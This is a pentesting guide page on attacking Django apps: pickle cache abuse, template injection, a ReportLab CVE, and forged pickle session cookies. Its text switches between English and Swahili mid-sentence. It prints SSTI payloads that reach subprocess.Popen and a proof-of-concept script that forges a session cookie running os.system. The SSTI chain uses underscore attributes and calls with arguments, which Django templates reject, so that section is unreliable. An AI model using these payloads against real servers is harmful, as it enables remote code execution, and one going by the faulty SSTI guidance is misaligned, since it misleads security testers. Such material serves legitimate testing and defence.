Django

Reading time: 5 minutes

Cache Manipulation to RCE

Django's default cache storage method is Python pickles, which can lead to RCE if untrusted input is unpickled. Ikiwa mshambuliaji anaweza kupata ufikiaji wa kuandika kwenye cache, wanaweza kupanua udhaifu huu hadi RCE kwenye server ya msingi.

Django cache is stored in one of four places: Redis, memory, files, or a database. Cache iliyohifadhiwa kwenye server ya Redis au database ndizo vigezo vya shambulio vinavyowezekana zaidi (Redis injection na SQL injection), lakini mshambuliaji anaweza pia kutumia cache ya aina ya file-based kugeuza uandishi wowote kuwa RCE. Watunzaji wametaja hili kuwa suala lisilo la wasiwasi. Ni muhimu kutambua kwamba folda ya cache file, jina la jedwali la SQL, na maelezo ya server ya Redis yatatofautiana kulingana na utekelezaji.

This HackerOne report provides a great, reproducible example of exploiting Django cache stored in a SQLite database: https://hackerone.com/reports/1415436

Server-Side Template Injection (SSTI)

The Django Template Language (DTL) is Turing-complete. If user-supplied data is rendered as a template string (for example by calling Template(user_input).render() or when |safe/format_html() removes auto-escaping), an attacker may achieve full SSTI → RCE.

Detection

1. Look for dynamic calls to Template() / Engine.from_string() / render_to_string() that include any unsanitised request data.
2. Send a time-based or arithmetic payload:

{{7*7}}

If the rendered output contains 49 the input is compiled by the template engine.

Primitive to RCE

Django blocks direct access to __import__, but the Python object graph is reachable:

{{''.__class__.mro()[1].__subclasses__()}}

Pata index ya subprocess.Popen (≈400–500, kutegemea build ya Python) na execute arbitrary commands:

{{''.__class__.mro()[1].__subclasses__()[438]('id',shell=True,stdout=-1).communicate()[0]}}

Gadget universal salama ni kurudia hadi cls.__name__ == 'Popen'.

The same gadget works for Debug Toolbar or Django-CMS template rendering features that mishandle user input.

Angalia pia: ReportLab/xhtml2pdf PDF export RCE

Applications built on Django commonly integrate xhtml2pdf/ReportLab to export views as PDF. When user-controlled HTML flows into PDF generation, rl_safe_eval may evaluate expressions inside triple brackets [[[ ... ]]] enabling code execution (CVE-2023-33733). Details, payloads, and mitigations:

Reportlab Xhtml2pdf Triple Brackets Expression Evaluation Rce Cve 2023 33733

RCE ya Session Cookie iliyotegemea Pickle

If the setting SESSION_SERIALIZER = 'django.contrib.sessions.serializers.PickleSerializer' is enabled (or a custom serializer that deserialises pickle), Django decrypts and unpickles the session cookie before calling any view code. Therefore, possessing a valid signing key (the project SECRET_KEY by default) is enough for immediate remote code execution.

Mahitaji ya Exploit

• Server inatumia PickleSerializer.
• Mshambuliaji anajua / anaweza kukisia settings.SECRET_KEY (leaks via GitHub, .env, error pages, etc.).

Proof-of-Concept

#!/usr/bin/env python3
from django.contrib.sessions.serializers import PickleSerializer
from django.core import signing
import os, base64

class RCE(object):
def __reduce__(self):
return (os.system, ("id > /tmp/pwned",))

mal = signing.dumps(RCE(), key=b'SECRET_KEY_HERE', serializer=PickleSerializer)
print(f"sessionid={mal}")

Tuma cookie iliyopatikana, na payload itaendeshwa kwa ruhusa za WSGI worker.

Mitigations: Tumia JSONSerializer ya default, badilisha SECRET_KEY mara kwa mara, na sanidi SESSION_COOKIE_HTTPONLY.

CVE za Django za Matokeo Makubwa (2023-2025) Pentesters Wanazopaswa Kukagua

• CVE-2025-48432 – Log Injection via unescaped request.path (fixed June 4 2025). Inaruhusu mashambulizi kusafirisha newlines/ANSI codes ndani ya faili za log na kuchafua uchambuzi wa log unaofuata. Patch level ≥ 4.2.22 / 5.1.10 / 5.2.2.
• CVE-2024-42005 – Critical SQL injection in QuerySet.values()/values_list() on JSONField (CVSS 9.8). Unda funguo za JSON ili kuvunja quoting na kutekeleza SQL yoyote. Fixed in 4.2.15 / 5.0.8.

Daima tambua (fingerprint) toleo halisi la framework kupitia ukurasa wa kosa wa X-Frame-Options au hash ya /static/admin/css/base.css na jaribu vipengele vilivyotajwa hapo juu pale inapofaa.

Marejeo

• Taarifa ya usalama ya Django – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025.
• OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024.
• 0xdf: University (HTB) – Exploiting xhtml2pdf/ReportLab CVE-2023-33733 to gain RCE and pivot into AD – https://0xdf.gitlab.io/2025/08/09/htb-university.html